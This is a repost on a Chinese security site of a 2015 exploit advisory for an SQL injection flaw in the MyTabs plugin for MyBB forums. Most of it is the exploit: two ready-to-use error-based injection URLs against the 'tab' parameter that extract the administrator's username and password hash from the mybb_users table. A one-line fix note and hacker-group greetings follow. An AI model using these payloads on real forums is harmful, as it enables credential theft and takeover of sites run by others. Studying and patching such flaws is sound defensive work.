MyBB 0day \ MyTabs (插件) SQL注射缺陷及修复

MyBB 0day \ MyTabs (插件) SQL注射缺陷及修复 - 网站安

来源：自学PHP网时间：2015-04-17 14:46 作者：阅读:次

[导读] # Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.# Author: AutoRUN dR.sqL# Vulnerable Software Link : http://mods.mybb.com/view/mytabsVulnerability ......

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Vulnerable Software Link : http://mods.mybb.com/view/mytabs

Vulnerability :

$~ http://www.2cto.com /mybbpath/index.php?tab=[SQLi]

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://www.2cto.com /mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

http://www.2cto.com /mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

_ _ ____ _ _ _ _ _ _ ____ _

修复：对index.php页面tab参数输入过滤

# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.

SiteGenius所有版本盲注缺陷及修复 - 网站安全 - 自

navicat提权及星外主机注册表mssql密码位置 - 网站

子栏目

MyBB 0day \ MyTabs (插件) SQL注射缺陷及修复 - 网站安

最新评论

添加评论

更多文章推荐

添加评论